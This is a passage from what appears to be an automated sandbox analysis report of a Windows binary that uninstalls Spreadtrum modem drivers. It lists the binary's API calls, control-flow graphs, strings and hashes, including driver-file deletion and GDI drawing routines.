                                                                  • SetupUninstallOEMInfW.SETUPAPI(?,00000001,00000000,0000000A,?,?,?,0000000A,?,?,?,00000001,?,?), ref: 001C153F
                                                                  • lstrlenW.KERNEL32(00000000,0000000A,00000000,?,00000000,?,?,?,0000000A,?,?,?,00000001,?,?), ref: 001C15C4
                                                                  • WideCharToMultiByte.KERNEL32(00000003,00000000,00000000,000000FF,?,?,00000000,00000000,?,00000000,?,?,?,0000000A), ref: 001C15F2
                                                                  • DeleteFileW.KERNEL32(?,0000000A,?,?,?,00000000,?,00000000,?,?,?,0000000A,?,?,?,00000001), ref: 001C168A
                                                                  • DeleteFileW.KERNEL32(?,?,?,?,00000000,?,00000000,?,?,?,0000000A,?,?,?,00000001), ref: 001C1693
                                                                  • DeleteFileW.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 001C1715
                                                                  • DeleteFileW.KERNELBASE(?), ref: 001C1757
                                                                  • DeleteFileW.KERNELBASE(?), ref: 001C1799
                                                                  • DeleteFileW.KERNELBASE(?), ref: 001C17DB
                                                                    • Part of subcall function 001C1FF0: SetupOpenInfFileW.SETUPAPI(?,00000000,00000002,00000000), ref: 001C2089
                                                                  • DeleteFileW.KERNELBASE(?), ref: 001C181D
                                                                  • DeleteFileW.KERNELBASE(?), ref: 001C185F
                                                                  • DeleteFileW.KERNELBASE(?), ref: 001C18A1
                                                                  • DeleteFileW.KERNELBASE(?), ref: 001C18E3
                                                                  • DeleteFileW.KERNELBASE(?), ref: 001C1925
                                                                  • DeleteFileW.KERNELBASE(?), ref: 001C1967
                                                                  • DeleteFileW.KERNELBASE(?), ref: 001C19A9
                                                                  • DeleteFileW.KERNELBASE(?), ref: 001C19EB
                                                                  • DeleteFileW.KERNELBASE(?), ref: 001C1A2D
                                                                  • DeleteFileW.KERNELBASE(?), ref: 001C1A6F
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.1369833186.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                  • Associated: 00000001.00000002.1369803154.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1369998860.00000000002E8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370048129.000000000032D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370048129.0000000000335000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370104153.000000000033B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370131712.0000000000366000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370154981.0000000000367000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_1c0000_BXOZIGZEUa.jbxd
                                                                  Similarity
                                                                  • API ID: File$Delete$ByteCharErrorMultiWidelstrlen$ModeSetup$CommandDirectoryHandleLastLineModuleOpenUninstallWindows_memset_wcsnlen_wcsrchr_wprintf
                                                                  • String ID: *.*$.inf$Fatal Error: MFC initialization failed$GetWindowsDirectory error:$P$Remove $Uninstall $\inf$\rdavcom.sys$\sprd_acm.sys$\sprd_enum.sys$\sprd_rdavcom.sys$\sprd_wvcom.sys$\sprd_wvmdm.sys$\sprdbus.sys$\sprdmodem.sys$\sprdmux.sys$\sprdport.sys$\sprdvcom.sys$\sprdvcomIOT.sys$\sprdvmdm.sys$\system32\drivers$\usbcommsprdserial.sys$oem$vector<T> too long
                                                                  • API String ID: 254025050-405532366
                                                                  • Opcode ID: 9fa65de33b8b4e12bb5c672ed9122fce962cb6050969229b9356586761feca4c
                                                                  • Instruction ID: 62e074dd74f7d95ca4e9eba58947a7360e945b14cb4e0a3aa9bdc96a64b501f4
                                                                  • Opcode Fuzzy Hash: 9fa65de33b8b4e12bb5c672ed9122fce962cb6050969229b9356586761feca4c
                                                                  • Instruction Fuzzy Hash: 3472C170A40604AFD714DB68CC85FAAB3B5FFA9324F148698E0199B2D2DB31ED41CF90

                                                                  Control-flow Graph

                                                                  APIs
                                                                  • __EH_prolog3.LIBCMT ref: 001CE148
                                                                  • GetSysColor.USER32(00000016), ref: 001CE157
                                                                  • GetSysColor.USER32(0000000F), ref: 001CE164
                                                                  • GetSysColor.USER32(00000015), ref: 001CE177
                                                                  • GetSysColor.USER32(0000000F), ref: 001CE17F
                                                                  • GetDeviceCaps.GDI32(?,0000000C), ref: 001CE1A5
                                                                  • GetSysColor.USER32(0000000F), ref: 001CE1B3
                                                                  • GetSysColor.USER32(00000010), ref: 001CE1BD
                                                                  • GetSysColor.USER32(00000015), ref: 001CE1C7
                                                                  • GetSysColor.USER32(00000016), ref: 001CE1D1
                                                                  • GetSysColor.USER32(00000014), ref: 001CE1DB
                                                                  • GetSysColor.USER32(00000012), ref: 001CE1E5
                                                                  • GetSysColor.USER32(00000011), ref: 001CE1EF
                                                                  • GetSysColor.USER32(00000006), ref: 001CE1F6
                                                                  • GetSysColor.USER32(0000000D), ref: 001CE1FD
                                                                  • GetSysColor.USER32(0000000E), ref: 001CE204
                                                                  • GetSysColor.USER32(00000005), ref: 001CE20B
                                                                  • GetSysColor.USER32(00000008), ref: 001CE215
                                                                  • GetSysColor.USER32(00000009), ref: 001CE21C
                                                                  • GetSysColor.USER32(00000007), ref: 001CE223
                                                                  • GetSysColor.USER32(00000002), ref: 001CE22A
                                                                  • GetSysColor.USER32(00000003), ref: 001CE231
                                                                  • GetSysColor.USER32(0000001B), ref: 001CE238
                                                                  • GetSysColor.USER32(0000001C), ref: 001CE242
                                                                  • GetSysColor.USER32(0000000A), ref: 001CE24C
                                                                  • GetSysColor.USER32(0000000B), ref: 001CE256
                                                                  • GetSysColor.USER32(00000013), ref: 001CE260
                                                                  • GetSysColor.USER32(0000001A), ref: 001CE27A
                                                                  • GetSysColorBrush.USER32(00000010), ref: 001CE295
                                                                  • GetSysColorBrush.USER32(00000014), ref: 001CE2AC
                                                                  • GetSysColorBrush.USER32(00000005), ref: 001CE2BE
                                                                  • CreateSolidBrush.GDI32(?), ref: 001CE2E2
                                                                  • CreateSolidBrush.GDI32(?), ref: 001CE2FE
                                                                  • CreateSolidBrush.GDI32(?), ref: 001CE31A
                                                                  • CreateSolidBrush.GDI32(?), ref: 001CE336
                                                                  • CreateSolidBrush.GDI32(?), ref: 001CE352
                                                                  • CreateSolidBrush.GDI32(?), ref: 001CE36E
                                                                  • CreateSolidBrush.GDI32(?), ref: 001CE38A
                                                                  • CreatePen.GDI32(00000000,00000001), ref: 001CE3B3
                                                                  • CreatePen.GDI32(00000000,00000001), ref: 001CE3D6
                                                                  • CreatePen.GDI32(00000000,00000001), ref: 001CE3F9
                                                                  • CreateSolidBrush.GDI32(?), ref: 001CE47D
                                                                  • CreatePatternBrush.GDI32(00000000), ref: 001CE4BE
                                                                    • Part of subcall function 001D0636: DeleteObject.GDI32(00000000), ref: 001D0645
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.1369833186.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                  • Associated: 00000001.00000002.1369803154.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1369998860.00000000002E8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370048129.000000000032D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370048129.0000000000335000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370104153.000000000033B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370131712.0000000000366000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370154981.0000000000367000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_1c0000_BXOZIGZEUa.jbxd
                                                                  Similarity
                                                                  • API ID: Color$BrushCreate$Solid$CapsDeleteDeviceH_prolog3ObjectPattern
                                                                  • String ID:
                                                                  • API String ID: 3754413814-0
                                                                  • Opcode ID: 6395e3069b300026c921572caabc4c8722bcf8a6dfacd51219dd7fe0d74decd4
                                                                  • Instruction ID: ad6e4dc4bb84430b7de367dcaa1a552d385dc54db1d254bc3faa45c685d64247
                                                                  • Opcode Fuzzy Hash: 6395e3069b300026c921572caabc4c8722bcf8a6dfacd51219dd7fe0d74decd4
                                                                  • Instruction Fuzzy Hash: CFB18C70900B449ED735AF75CC96BABBBE4AFA4300F00492EE29B96691DF70E544DF60

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 611 237836-23784c call 2bea56 614 237852-237865 611->614 615 237947-23794c call 2beb2e 611->615 616 237867-237879 614->616 617 2378d4 614->617 619 23787b-237882 616->619 620 237888-2378d2 616->620 621 2378d6-2378de 617->621 619->620 620->621 623 2378f3-237900 call 232dea 621->623 624 2378e0-2378e3 621->624 632 237902-23790c call 233fea 623->632 633 237911-237930 call 1d0e38 * 2 623->633 625 2378e5-2378ec 624->625 626 23794d-237953 624->626 628 2378ee call 237335 625->628 626->615 629 237955-237969 call 1d0e38 626->629 628->623 629->623 637 23796b-237971 629->637 632->633 645 237932-237937 call 233bc6 633->645 646 23793c-237941 633->646 640 237979-237982 637->640 642 237c08-237cdd call 1cacff call 2bea56 call 1cfcaf call 1caf34 call 1c86c0 call 1e78df call 2330a8 call 1e7912 640->642 643 237988-237998 640->643 701 237d13-237d15 642->701 702 237cdf-237cfd CreateCompatibleDC * 2 642->702 643->642 644 23799e-2379c8 call 235b3b 643->644 653 2379ca-2379d7 call 1d060a 644->653 654 2379d9-2379e1 644->654 645->646 646->615 653->654 662 237a0b-237a26 GetObjectW 653->662 657 2379e3-2379e9 654->657 658 2379f8-237a08 LoadImageW 654->658 657->658 661 2379eb-2379f1 657->661 658->662 661->658 665 2379f3 661->665 666 237a38-237a3d 662->666 667 237a28-237a33 call 232fcc 662->667 665->658 668 237a44-237a4a 666->668 669 237a3f-237a42 666->669 673 237bd3-237bfd call 237da3 DeleteObject call 1cdc8f 667->673 672 237a50-237a53 668->672 668->673 669->668 669->672 672->673 676 237a59-237a89 call 1cfcaf CreateCompatibleDC call 1d0308 GetObjectW 672->676 690 237973-237976 673->690 691 237c03 673->691 692 237bc7-237bce call 1d0389 676->692 693 237a8f-237a9c SelectObject 676->693 690->640 691->623 692->673 693->692 696 237aa2-237ac4 CreateCompatibleBitmap 693->696 698 237ad3-237afe call 1cfcaf CreateCompatibleDC call 1d0308 SelectObject 696->698 699 237ac6-237ace SelectObject 696->699 714 237b00-237b11 SelectObject DeleteObject 698->714 715 237b16-237b37 BitBlt 698->715 699->692 706 237d16-237da1 call 237836 call 2beb2e 701->706 704 237d03 call 1cfc45 702->704 705 237cff-237d01 702->705 709 237d08-237d11 704->709 705->704 705->709 709->706 717 237bbb-237bc2 call 1d0389 714->717 718 237b39-237b3f 715->718 719 237b9c-237bb8 SelectObject * 2 DeleteObject 715->719 717->692 722 237b91-237b9a 718->722 723 237b41-237b58 GetPixel 718->723 719->717 722->718 722->719 724 237b6a-237b6c call 232e23 723->724 725 237b5a-237b60 723->725 729 237b71-237b74 724->729 725->724 726 237b62-237b68 call 232ea5 725->726 726->729 731 237b86-237b8f 729->731 732 237b76-237b80 SetPixel 729->732 731->722 731->723 732->731
                                                                  APIs
                                                                  • __EH_prolog3.LIBCMT ref: 00237840
                                                                  • LoadImageW.USER32(00000000,?,00000000,00000000,00000000,00002000), ref: 00237A02
                                                                  • GetObjectW.GDI32(00000082,00000018,?), ref: 00237A14
                                                                  • CreateCompatibleDC.GDI32(00000000), ref: 00237A66
                                                                  • GetObjectW.GDI32(00000082,00000018,?), ref: 00237A81
                                                                  • SelectObject.GDI32(?,00000082), ref: 00237A95
                                                                  • CreateCompatibleBitmap.GDI32(?,?,?), ref: 00237AB9
                                                                  • SelectObject.GDI32(?,00000000), ref: 00237ACC
                                                                  • CreateCompatibleDC.GDI32(?), ref: 00237AE2
                                                                  • SelectObject.GDI32(?,?), ref: 00237AF7
                                                                  • SelectObject.GDI32(?,00000000), ref: 00237B06
                                                                  • DeleteObject.GDI32(?), ref: 00237B0B
                                                                  • BitBlt.GDI32(?,00000000,00000000,?,?,?,00000000,00000000,00CC0020), ref: 00237B2B
                                                                  • GetPixel.GDI32(?,?,?), ref: 00237B4A
                                                                  • SetPixel.GDI32(?,?,?,00000000), ref: 00237B80
                                                                  • SelectObject.GDI32(?,?), ref: 00237BA2
                                                                  • SelectObject.GDI32(?,00000000), ref: 00237BAA
                                                                  • DeleteObject.GDI32(00000082), ref: 00237BAF
                                                                  • DeleteObject.GDI32(00000082), ref: 00237BE1
                                                                  • __EH_prolog3.LIBCMT ref: 00237C15
                                                                  • CreateCompatibleDC.GDI32(00000000), ref: 00237CE0
                                                                  • CreateCompatibleDC.GDI32(00000000), ref: 00237CEC
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.1369833186.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                  • Associated: 00000001.00000002.1369803154.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1369998860.00000000002E8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370048129.000000000032D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370048129.0000000000335000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370104153.000000000033B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370131712.0000000000366000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370154981.0000000000367000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_1c0000_BXOZIGZEUa.jbxd
                                                                  Similarity
                                                                  • API ID: Object$Select$CompatibleCreate$Delete$H_prolog3Pixel$BitmapImageLoad
                                                                  • String ID: $TR/
                                                                  • API String ID: 1197801157-1616536723
                                                                  • Opcode ID: 15a26b9c4cb43ea1b6ad41f728dfd6cb5565c51d869b4e10d060cee974009517
                                                                  • Instruction ID: 693e858697097215d82c16967f04feee184fd06eed66f90fae158ae5f7973954
                                                                  • Opcode Fuzzy Hash: 15a26b9c4cb43ea1b6ad41f728dfd6cb5565c51d869b4e10d060cee974009517
                                                                  • Instruction Fuzzy Hash: 03026DB0D10229DFCF25DFA4D884AEDBBB5FF08700F10816AE849AA256D7708955DFA0

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 784 1ca0e9-1ca12e call 1cf877 GetModuleFileNameW 787 1ca134 call 1cfc61 784->787 788 1ca130-1ca132 784->788 789 1ca139-1ca14e PathFindExtensionW 787->789 788->787 788->789 791 1ca155-1ca176 call 1ca0a3 789->791 792 1ca150 call 1cfc61 789->792 796 1ca17d-1ca181 791->796 797 1ca178 call 1cfc61 791->797 792->791 799 1ca19c-1ca1a0 796->799 800 1ca183-1ca195 call 2bf65f 796->800 797->796 802 1ca1d5-1ca1d9 799->802 803 1ca1a2-1ca1b3 call 1cadc2 799->803 800->799 809 1ca197 call 1cacc7 800->809 804 1ca1db-1ca1f3 call 1cadc2 802->804 805 1ca214-1ca21e 802->805 812 1ca1b8-1ca1ba 803->812 821 1ca1f5-1ca205 call 2bf65f 804->821 822 1ca207 804->822 810 1ca27e-1ca282 805->810 811 1ca220-1ca238 805->811 809->799 815 1ca284-1ca2b0 call 2bf5ea call 1c87c0 call 2bf65f 810->815 816 1ca2b6-1ca2c4 call 2bc787 810->816 817 1ca23a-1ca23f 811->817 818 1ca241 811->818 819 1ca1bc-1ca1c3 812->819 820 1ca1c5 812->820 815->809 815->816 824 1ca246-1ca26d call 2be545 call 1c87c0 call 2bf65f 817->824 818->824 825 1ca1c8-1ca1d3 call 2bf65f 819->825 820->825 829 1ca20e-1ca212 821->829 822->829 824->809 844 1ca273-1ca27b 824->844 825->802 825->809 829->805 829->809 844->810
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.1369833186.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                  • Associated: 00000001.00000002.1369803154.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1369998860.00000000002E8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370048129.000000000032D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370048129.0000000000335000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370104153.000000000033B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370131712.0000000000366000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370154981.0000000000367000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_1c0000_BXOZIGZEUa.jbxd
                                                                  Similarity
                                                                  • API ID: __wcsdup$ExtensionFileFindModuleNamePath
                                                                  • String ID: .CHM$.HLP$.INI$X*1
                                                                  • API String ID: 2477486372-2042891934
                                                                  • Opcode ID: 42e4a2796e3aaabbaa14999dc21c6c38f7ee6520d53bd3c6db43d84cccf28eb6
                                                                  • Instruction ID: 2a47c135355ef3049c5a04b8690c00bc050f337ebb5ecf626e637fb27e6ee182
                                                                  • Opcode Fuzzy Hash: 42e4a2796e3aaabbaa14999dc21c6c38f7ee6520d53bd3c6db43d84cccf28eb6
                                                                  • Instruction Fuzzy Hash: EF51707090075C9ADB22EB74CD45F9A77FCAF24708F4448AEA946D2541EF70E984CF62

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 845 1d1323-1d1344 EnterCriticalSection 846 1d1346-1d134d 845->846 847 1d1353-1d1358 845->847 846->847 848 1d1411-1d1414 846->848 849 1d135a-1d135d 847->849 850 1d1375-1d137d 847->850 854 1d141c-1d143a LeaveCriticalSection 848->854 855 1d1416-1d1419 848->855 853 1d1360-1d1363 849->853 851 1d137f-1d1392 call 1cafc0 GlobalAlloc 850->851 852 1d1394-1d13b8 GlobalHandle GlobalUnlock call 1cafc0 GlobalReAlloc 850->852 862 1d13be-1d13c0 851->862 852->862 858 1d136d-1d136f 853->858 859 1d1365-1d136b 853->859 855->854 858->848 858->850 859->853 859->858 863 1d13e5-1d140e GlobalLock call 2bf570 862->863 864 1d13c2-1d13c7 862->864 863->848 865 1d13c9-1d13d1 GlobalHandle GlobalLock 864->865 866 1d13d7-1d13e0 LeaveCriticalSection call 1cacc7 864->866 865->866 866->863
                                                                  APIs
                                                                  • EnterCriticalSection.KERNEL32(00333518,?,?,00000000,003334FC,003334FC,?,001D1686,00000004,001CF886,001CAD1B,001CA2E2,?,?,001C106C,00000000), ref: 001D1336
                                                                  • GlobalAlloc.KERNELBASE(00000002,00000000,?,?,00000000,003334FC,003334FC,?,001D1686,00000004,001CF886,001CAD1B,001CA2E2,?,?,001C106C), ref: 001D138C
                                                                  • GlobalHandle.KERNEL32(00D467A8), ref: 001D1395
                                                                  • GlobalUnlock.KERNEL32(00000000), ref: 001D139F
                                                                  • GlobalReAlloc.KERNEL32(?,00000000,00002002), ref: 001D13B8
                                                                  • GlobalHandle.KERNEL32(00D467A8), ref: 001D13CA
                                                                  • GlobalLock.KERNEL32(00000000), ref: 001D13D1
                                                                  • LeaveCriticalSection.KERNEL32(?,?,?,00000000,003334FC,003334FC,?,001D1686,00000004,001CF886,001CAD1B,001CA2E2,?,?,001C106C,00000000), ref: 001D13DA
                                                                  • GlobalLock.KERNEL32(00000000), ref: 001D13E6
                                                                  • _memset.LIBCMT ref: 001D1400
                                                                  • LeaveCriticalSection.KERNEL32(?), ref: 001D142E
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.1369833186.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                  • Associated: 00000001.00000002.1369803154.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1369998860.00000000002E8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370048129.000000000032D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370048129.0000000000335000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370104153.000000000033B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370131712.0000000000366000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370154981.0000000000367000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_1c0000_BXOZIGZEUa.jbxd
                                                                  Similarity
                                                                  • API ID: Global$CriticalSection$AllocHandleLeaveLock$EnterUnlock_memset
                                                                  • String ID:
                                                                  • API String ID: 496899490-0
                                                                  • Opcode ID: 3c16c147b12b4bccfa4f3cd06aab44410167ee218291143783dcac8237d21825
                                                                  • Instruction ID: 25509556acf8c4f3cac0e79844909c6e200f12a670aa5a45a16e435106a55b0a
                                                                  • Opcode Fuzzy Hash: 3c16c147b12b4bccfa4f3cd06aab44410167ee218291143783dcac8237d21825
                                                                  • Instruction Fuzzy Hash: F931AB71640704BFDB209F68EC89A6ABBF9FF44B14B05496EF58AD7660DB30F8408B50

                                                                  Control-flow Graph

                                                                  APIs
                                                                  • __EH_prolog3.LIBCMT ref: 0024BD9F
                                                                    • Part of subcall function 001D61F6: EnterCriticalSection.KERNEL32(00333728,?,?,00000000,?,001D124C,00000010,00000008,001CF8A5,001CF83C,001CAD1B,001CA2E2,?,?,001C106C,00000000), ref: 001D6230
                                                                    • Part of subcall function 001D61F6: InitializeCriticalSection.KERNEL32(?,?,?,00000000,?,001D124C,00000010,00000008,001CF8A5,001CF83C,001CAD1B,001CA2E2,?,?,001C106C,00000000), ref: 001D6242
                                                                    • Part of subcall function 001D61F6: LeaveCriticalSection.KERNEL32(00333728,?,?,00000000,?,001D124C,00000010,00000008,001CF8A5,001CF83C,001CAD1B,001CA2E2,?,?,001C106C,00000000), ref: 001D624F
                                                                    • Part of subcall function 001D61F6: EnterCriticalSection.KERNEL32(?,?,?,00000000,?,001D124C,00000010,00000008,001CF8A5,001CF83C,001CAD1B,001CA2E2,?,?,001C106C,00000000), ref: 001D625F
                                                                  • GetProfileIntW.KERNEL32(windows,DragMinDist,00000002), ref: 0024BDF7
                                                                  • GetProfileIntW.KERNEL32(windows,DragDelay,000000C8), ref: 0024BE09
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.1369833186.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                  • Associated: 00000001.00000002.1369803154.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1369998860.00000000002E8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370048129.000000000032D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370048129.0000000000335000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370104153.000000000033B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370131712.0000000000366000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370154981.0000000000367000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_1c0000_BXOZIGZEUa.jbxd
                                                                  Similarity
                                                                  • API ID: CriticalSection$EnterProfile$H_prolog3InitializeLeave
                                                                  • String ID: s/$DragDelay$DragMinDist$windows
                                                                  • API String ID: 3965097884-3074193238
                                                                  • Opcode ID: 42e89f71b42aeeeed617d87c66f85044f52669e368af0394e0a75b9c03a9e763
                                                                  • Instruction ID: ded96ef443ca5fcaad9439d15c93c4bc25c749b112a1313c5f9d7988211d0610
                                                                  • Opcode Fuzzy Hash: 42e89f71b42aeeeed617d87c66f85044f52669e368af0394e0a75b9c03a9e763
                                                                  • Instruction Fuzzy Hash: 0C01A2B0950744EFD722AF268A8265AFAF8FFA0700F41565FE2459B761C7F0A411CF44

                                                                  Control-flow Graph

                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.1369833186.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                  • Associated: 00000001.00000002.1369803154.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1369998860.00000000002E8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370048129.000000000032D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370048129.0000000000335000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370104153.000000000033B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370131712.0000000000366000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370154981.0000000000367000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_1c0000_BXOZIGZEUa.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: *.*$4)1$oem$vector<T> too long
                                                                  • API String ID: 0-961408045
                                                                  • Opcode ID: 5d9d495967f14dc3313de17ab6d4417bbad865b5bc72b229d95e96ca1f1292f8
                                                                  • Instruction ID: 2db86a49397980ed489ed20a93b67ff99f0f81b2d7c32c70cd12a474124dcc02
                                                                  • Opcode Fuzzy Hash: 5d9d495967f14dc3313de17ab6d4417bbad865b5bc72b229d95e96ca1f1292f8
                                                                  • Instruction Fuzzy Hash: A8919F71A41605ABCB05DBA8C895FEDB7B5FF66320F14825CE421AB2D2DB70EE44CB50

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 995 1cf00f-1cf04a GetModuleFileNameW 996 1cf0f5-1cf102 call 2bc787 995->996 997 1cf050-1cf055 995->997 999 1cf064-1cf0ac CreateActCtxWWorker 997->999 1000 1cf057-1cf05f SetLastError 997->1000 1002 1cf0ae-1cf0c1 CreateActCtxWWorker 999->1002 1003 1cf0c7-1cf0ce 999->1003 1000->996 1002->1003 1003->996 1004 1cf0d0-1cf0ec CreateActCtxWWorker 1003->1004 1004->996 1005 1cf0ee 1004->1005 1005->996
                                                                  APIs
                                                                  • GetModuleFileNameW.KERNEL32(?,?,00000105,?,?), ref: 001CF042
                                                                  • SetLastError.KERNEL32(0000006F,?,?), ref: 001CF059
                                                                  • CreateActCtxWWorker.KERNEL32(?,?,?), ref: 001CF0A1
                                                                  • CreateActCtxWWorker.KERNEL32(00000020,?,?), ref: 001CF0BF
                                                                  • CreateActCtxWWorker.KERNEL32(00000020,?,?), ref: 001CF0E1
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.1369833186.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                  • Associated: 00000001.00000002.1369803154.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1369998860.00000000002E8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370048129.000000000032D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370048129.0000000000335000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370104153.000000000033B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370131712.0000000000366000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370154981.0000000000367000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_1c0000_BXOZIGZEUa.jbxd
                                                                  Similarity
                                                                  • API ID: CreateWorker$ErrorFileLastModuleName
                                                                  • String ID:
                                                                  • API String ID: 3218422885-3916222277
                                                                  • Opcode ID: 3edb17db2e4c179d2505c34fea6cf03f9e8342415d7bd4872a3661f2b6d70319
                                                                  • Instruction ID: 913f4889a3c3e97e49e50970623eee14a8ed6f65bef36bc569cd41942a01ccf9
                                                                  • Opcode Fuzzy Hash: 3edb17db2e4c179d2505c34fea6cf03f9e8342415d7bd4872a3661f2b6d70319
                                                                  • Instruction Fuzzy Hash: 1E216D708003189ECB20DF65D888BEEB7F9BF14724F1046AED069D2190DB709A86DF51

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
